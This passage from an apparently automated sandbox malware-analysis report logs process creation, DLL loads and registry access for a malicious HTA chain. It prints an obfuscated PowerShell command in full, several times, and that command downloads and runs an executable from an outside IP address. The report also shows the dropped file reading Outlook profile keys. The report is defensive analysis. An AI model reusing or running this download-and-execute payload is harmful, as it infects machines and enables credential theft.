pBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csoss.exe "C:\Users\user\AppData\Roaming\csoss.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5CF.tmp" "c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csoss.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Binary string: wntdll.pdbUGP source: csoss.exe, 00000006.00000003.1394760413.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1395803435.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: csoss.exe, 00000006.00000003.1394760413.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1395803435.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.pdb source: powershell.exe, 00000003.00000002.1400376615.0000000004B4A000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    PowerShell case anomaly found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV